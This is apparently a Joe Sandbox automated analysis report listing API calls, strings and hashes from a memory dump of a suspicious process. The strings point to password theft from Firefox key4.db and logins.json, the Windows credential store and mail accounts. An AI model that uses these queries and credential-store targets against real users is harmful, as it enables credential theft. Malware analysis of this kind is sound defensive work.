                                                                • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                              • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040685E
                                                              • memcmp.MSVCRT(00000000,00457934,00000006,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040686E
                                                              • memcpy.MSVCRT(?,00000023,?,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068A1
                                                              • memcpy.MSVCRT(?,?,00000010), ref: 004068BA
                                                              • memcpy.MSVCRT(?,?,00000010), ref: 004068D3
                                                              • memcmp.MSVCRT(00000000,0045793C,00000006,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068EC
                                                              • memcpy.MSVCRT(?,00000015,?), ref: 00406908
                                                              • memcmp.MSVCRT(00000000,00456EA0,00000010,?,?,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 004069B2
                                                              • memcmp.MSVCRT(00000000,00457944,00000006), ref: 004069CA
                                                              • memcpy.MSVCRT(?,00000023,?), ref: 00406A03
                                                              • memcpy.MSVCRT(?,00000042,00000010), ref: 00406A1F
                                                              • memcpy.MSVCRT(?,00000054,00000020), ref: 00406A3B
                                                              • memcmp.MSVCRT(00000000,0045794C,00000006), ref: 00406A4A
                                                              • memcpy.MSVCRT(?,00000015,?), ref: 00406A6E
                                                              • memcpy.MSVCRT(?,0000001A,00000020), ref: 00406A86
                                                              Strings
                                                              • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 004067C4
                                                              • key4.db, xrefs: 00406756
                                                              • SELECT a11,a102 FROM nssPrivate, xrefs: 00406933
                                                              • , xrefs: 00406834
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy$memcmp$memsetstrlen
                                                              • String ID: $SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                                                              • API String ID: 3614188050-3983245814
                                                              • Opcode ID: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                              • Instruction ID: f64da88478914857a13bd548ab7de8656dcb141f17a11f318e4dfa38f1e39988
                                                              • Opcode Fuzzy Hash: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                              • Instruction Fuzzy Hash: 76A1C7B1A00215ABDB14EFA5D841BDFB3A8FF44308F11453BF515E7282E778EA548B98
                                                              APIs
                                                              • memset.MSVCRT ref: 0040A973
                                                              • memset.MSVCRT ref: 0040A996
                                                              • memset.MSVCRT ref: 0040A9AC
                                                              • memset.MSVCRT ref: 0040A9BC
                                                              • sprintf.MSVCRT ref: 0040A9F0
                                                              • _mbscpy.MSVCRT(00000000, nowrap), ref: 0040AA37
                                                              • sprintf.MSVCRT ref: 0040AABE
                                                              • _mbscat.MSVCRT ref: 0040AAED
                                                                • Part of subcall function 00410FD3: sprintf.MSVCRT ref: 00410FF7
                                                              • _mbscpy.MSVCRT(?,?), ref: 0040AAD2
                                                              • sprintf.MSVCRT ref: 0040AB21
                                                                • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040AB7D,?,<item>), ref: 00406D4D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memsetsprintf$_mbscpy$FileWrite_mbscatstrlen
                                                              • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                              • API String ID: 710961058-601624466
                                                              • Opcode ID: d99efe9fa263efa73d2f59ab46a5965583c80ed56cb3263ce5a85c5ce08305dc
                                                              • Instruction ID: c58e6c37e7046e1a5f8c637d7d1376bb8f99d5739874c3f6ad91cefff1898c28
                                                              • Opcode Fuzzy Hash: d99efe9fa263efa73d2f59ab46a5965583c80ed56cb3263ce5a85c5ce08305dc
                                                              • Instruction Fuzzy Hash: 5F61BC31900258AFEF14DF58CC86E9E7B79EF08314F10019AF909AB1D2DB78AA51CB55
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: sprintf$memset$_mbscpy
                                                              • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                              • API String ID: 3402215030-3842416460
                                                              • Opcode ID: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                                              • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                                                              • Opcode Fuzzy Hash: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                                              • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                                                              APIs
                                                                • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                                                • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                                                                • Part of subcall function 004080D4: free.MSVCRT ref: 004080DB
                                                                • Part of subcall function 00407035: _mbscpy.MSVCRT(?,?,0040F113,?,?,?,?,?), ref: 0040703A
                                                                • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                                                • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                                                • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                                                • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                                                • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                                              • strlen.MSVCRT ref: 0040F139
                                                              • strlen.MSVCRT ref: 0040F147
                                                              • memset.MSVCRT ref: 0040F187
                                                              • strlen.MSVCRT ref: 0040F196
                                                              • strlen.MSVCRT ref: 0040F1A4
                                                              • memset.MSVCRT ref: 0040F1EA
                                                              • strlen.MSVCRT ref: 0040F1F9
                                                              • strlen.MSVCRT ref: 0040F207
                                                              • _strcmpi.MSVCRT ref: 0040F2B2
                                                              • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F2CD
                                                              • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F30E
                                                                • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: strlen$memset$_mbscpy$memcpy$CloseFileHandleSize_mbscat_mbsicmp_strcmpifreestrrchr
                                                              • String ID: logins.json$none$signons.sqlite$signons.txt
                                                              • API String ID: 2003275452-3138536805
                                                              • Opcode ID: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                                              • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                                                              • Opcode Fuzzy Hash: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                                              • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                                                              APIs
                                                              • memset.MSVCRT ref: 0040C3F7
                                                              • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040C408
                                                              • strrchr.MSVCRT ref: 0040C417
                                                              • _mbscat.MSVCRT ref: 0040C431
                                                              • _mbscpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040C465
                                                              • _mbscpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040C476
                                                              • GetWindowPlacement.USER32(?,?), ref: 0040C50C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                              • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                              • API String ID: 1012775001-1343505058
                                                              • Opcode ID: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                                              • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                                                              • Opcode Fuzzy Hash: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                                              • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
                                                              APIs
                                                              • memset.MSVCRT ref: 00444612
                                                                • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                              • strlen.MSVCRT ref: 0044462E
                                                              • memset.MSVCRT ref: 00444668
                                                              • memset.MSVCRT ref: 0044467C
                                                              • memset.MSVCRT ref: 00444690
                                                              • memset.MSVCRT ref: 004446B6
                                                                • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                              • memcpy.MSVCRT(?,00000000,00000008,?,?,?,00000000,000003FF,?,00000000,0000041E,?,00000000,0000041E,?,00000000), ref: 004446ED
                                                                • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                              • memcpy.MSVCRT(?,?,00000010,?,?), ref: 00444729
                                                              • memcpy.MSVCRT(?,?,00000008,?,?,00000010,?,?), ref: 0044473B
                                                              • _mbscpy.MSVCRT(?,?), ref: 00444812
                                                              • memcpy.MSVCRT(?,?,00000004,?,?,?,?), ref: 00444843
                                                              • memcpy.MSVCRT(?,?,00000004,?,?,00000004,?,?,?,?), ref: 00444855
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpymemset$strlen$_mbscpy
                                                              • String ID: salu
                                                              • API String ID: 3691931180-4177317985
                                                              • Opcode ID: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                                                              • Instruction ID: b87b4f34a2d3e3c1159852785770864cc269bb22f3616182f1b5584d27518a2a
                                                              • Opcode Fuzzy Hash: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                                                              • Instruction Fuzzy Hash: 65713D7190015DAADB10EBA5CC81ADEB7B8FF44348F1444BAF648E7141DB38AB498F95
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                                                              • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                                                              • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                                                              • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                                                              • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                                                              • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                                                              • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$Library$FreeLoad
                                                              • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                              • API String ID: 2449869053-232097475
                                                              • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                              • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                                                              • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                              • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                                                              APIs
                                                              • sprintf.MSVCRT ref: 0040957B
                                                              • LoadMenuA.USER32(?,?), ref: 00409589
                                                                • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                                                                • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                                                                • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                                                                • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                                                              • DestroyMenu.USER32(00000000), ref: 004095A7
                                                              • sprintf.MSVCRT ref: 004095EB
                                                              • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                                                              • memset.MSVCRT ref: 0040961C
                                                              • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                                                              • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                                                              • DestroyWindow.USER32(00000000), ref: 0040965C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                              • String ID: caption$dialog_%d$menu_%d
                                                              • API String ID: 3259144588-3822380221
                                                              • Opcode ID: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                                                              • Instruction ID: e9c2f3b5cfdd7c6c8f350bf48a14ef17ef5fca4d90bdc7cc97d58e5e48f5f72a
                                                              • Opcode Fuzzy Hash: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                                                              • Instruction Fuzzy Hash: 5C212672901288BFDB129F509C81EAF3768FB09305F044076FA01A1192E7B99D548B6E
                                                              APIs
                                                                • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                                                              • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                              • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                              • GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                              • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                              • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                              • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$Library$FreeLoad
                                                              • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                              • API String ID: 2449869053-4258758744
                                                              • Opcode ID: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                              • Instruction ID: 2cc24b9197253aa622afa6144fd2e07652f81762edb29d5cb7a2b3ace442d85c
                                                              • Opcode Fuzzy Hash: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                              • Instruction Fuzzy Hash: 12014FB49017009ADB30AF75C809B46BBE0EFA9704F214C2FE295A3691E77ED445CF88
                                                              APIs
                                                              • wcsstr.MSVCRT ref: 0040426A
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                                                              • _mbscpy.MSVCRT(?,?), ref: 004042D5
                                                              • _mbscpy.MSVCRT(?,?,?,?), ref: 004042E8
                                                              • strchr.MSVCRT ref: 004042F6
                                                              • strlen.MSVCRT ref: 0040430A
                                                              • sprintf.MSVCRT ref: 0040432B
                                                              • strchr.MSVCRT ref: 0040433C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                                              • String ID: %s@gmail.com$www.google.com
                                                              • API String ID: 3866421160-4070641962
                                                              • Opcode ID: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                                              • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                                                              • Opcode Fuzzy Hash: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                                              • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                                                              APIs
                                                              • _mbscpy.MSVCRT(0045A448,?), ref: 00409749
                                                              • _mbscpy.MSVCRT(0045A550,general,0045A448,?), ref: 00409759
                                                                • Part of subcall function 0040930C: memset.MSVCRT ref: 00409331
                                                                • Part of subcall function 0040930C: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,?,00001000,0045A448), ref: 00409355
                                                                • Part of subcall function 0040930C: WritePrivateProfileStringA.KERNEL32(0045A550,?,?,0045A448), ref: 0040936C
                                                              • EnumResourceNamesA.KERNEL32(?,00000004,Function_0000955A,00000000), ref: 0040978F
                                                              • EnumResourceNamesA.KERNEL32(?,00000005,Function_0000955A,00000000), ref: 00409799
                                                              • _mbscpy.MSVCRT(0045A550,strings), ref: 004097A1
                                                              • memset.MSVCRT ref: 004097BD
                                                              • LoadStringA.USER32(?,00000000,?,00001000), ref: 004097D1
                                                                • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                                              • String ID: TranslatorName$TranslatorURL$general$strings
                                                              • API String ID: 1035899707-3647959541
                                                              • Opcode ID: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                                                              • Instruction ID: 9d87356d66cebc64c7ffc1a8588b7925a858c7ffbf95e02bf5fcf8d8eff5f455
                                                              • Opcode Fuzzy Hash: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                                                              • Instruction Fuzzy Hash: F711C87290016475F7312B569C46F9B3F5CDBCAB55F10007BBB08A71C3D6B89D408AAD
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                                              • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                              • API String ID: 2360744853-2229823034
                                                              • Opcode ID: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                                              • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                                                              • Opcode Fuzzy Hash: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                                              • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                                                              APIs
                                                              • strchr.MSVCRT ref: 004100E4
                                                              • _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                              • _mbscpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 00410142
                                                              • _mbscat.MSVCRT ref: 0041014D
                                                              • memset.MSVCRT ref: 00410129
                                                                • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                                                • Part of subcall function 0040715B: _mbscpy.MSVCRT(00000000,0045AA00,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407180
                                                              • memset.MSVCRT ref: 00410171
                                                              • memcpy.MSVCRT(?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0041018C
                                                              • _mbscat.MSVCRT ref: 00410197
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                              • String ID: \systemroot
                                                              • API String ID: 912701516-1821301763
                                                              • Opcode ID: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                                              • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                                                              • Opcode Fuzzy Hash: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                                              • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                                                              APIs
                                                              • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                              • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410916
                                                              • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                              • memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                              • CoTaskMemFree.COMBASE(00000000), ref: 00410970
                                                              Strings
                                                              • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 004108FD
                                                              • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410911
                                                              • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041090A
                                                              • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0041091E
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: FromStringUuid$FreeTaskmemcpy
                                                              • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                                                              • API String ID: 1640410171-2022683286
                                                              • Opcode ID: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                                                              • Instruction ID: 9e6d0ab6f4d779539f8eb1da53a4fb6c135c1230b89e6f6df403d509513a9b08
                                                              • Opcode Fuzzy Hash: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                                                              • Instruction Fuzzy Hash: AD1151B391011DAAEF11EEA5DC80EEB37ACAB45350F040027F951E3251E6B4D9458BA5
                                                              APIs
                                                                • Part of subcall function 00412F93: strlen.MSVCRT ref: 00412FA1
                                                              • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041983C
                                                              • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041985B
                                                              • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041986D
                                                              • memcpy.MSVCRT(?,-journal,0000000A,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 00419885
                                                              • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 004198A2
                                                              • memcpy.MSVCRT(?,-wal,00000005,?,?,?,?,?,?,?,?,?,00000000,00000000,004067AF), ref: 004198BA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy$strlen
                                                              • String ID: -journal$-wal$immutable$nolock
                                                              • API String ID: 2619041689-3408036318
                                                              • Opcode ID: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                              • Instruction ID: 25f2131b2e7268d2841c48c11c9a86e68458d3caa4be6fdea11427aceae17f40
                                                              • Opcode Fuzzy Hash: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                              • Instruction Fuzzy Hash: 9FC1D1B1A04606EFDB14DFA5C841BDEFBB0BF45314F14815EE528A7381D778AA90CB98
                                                              APIs
                                                                • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                              • wcslen.MSVCRT ref: 0040874A
                                                              • wcsncmp.MSVCRT ref: 00408794
                                                              • memset.MSVCRT ref: 0040882A
                                                              • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?), ref: 00408849
                                                              • wcschr.MSVCRT ref: 0040889F
                                                              • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
